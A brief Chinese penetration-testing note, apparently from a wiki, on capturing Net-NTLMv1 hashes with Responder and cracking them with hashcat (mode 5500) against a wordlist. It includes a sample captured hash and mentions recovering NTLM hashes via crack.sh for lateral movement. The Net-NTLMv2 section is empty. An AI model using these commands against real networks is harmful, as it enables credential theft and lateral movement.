NET NTLMv1还原破解&v2破解

NET-NTLMv1破解

sudo responder -I eth1 -rPv
# 开启监听
hashcat -m 5500 test1::FBI:19855A14AEAAA6BC00000000000000000000000000000000:CDDA70602BB160B8E00FAF2386E17755316DEA48DE04CB09:6783537172a9d1bc pwd.txt
# 将监听到的hash拿去hashcat破解,pwd.txt为密码字典

注:

NET-NTLMv1还原

将获取到的NTHASH放到Get Cracking | crack.sharrow-up-right还原即可,这样获取到的ntlmv1 hash一定可以还原为NTLM hash,然后可以拿去横向,但是这个网站最近无法使用,贴一个网上其他师傅的图

图片来源:Net- NTLM 利用 - windows protocol (gitbook.io)arrow-up-right

NET-NTLMv2破解

Last updated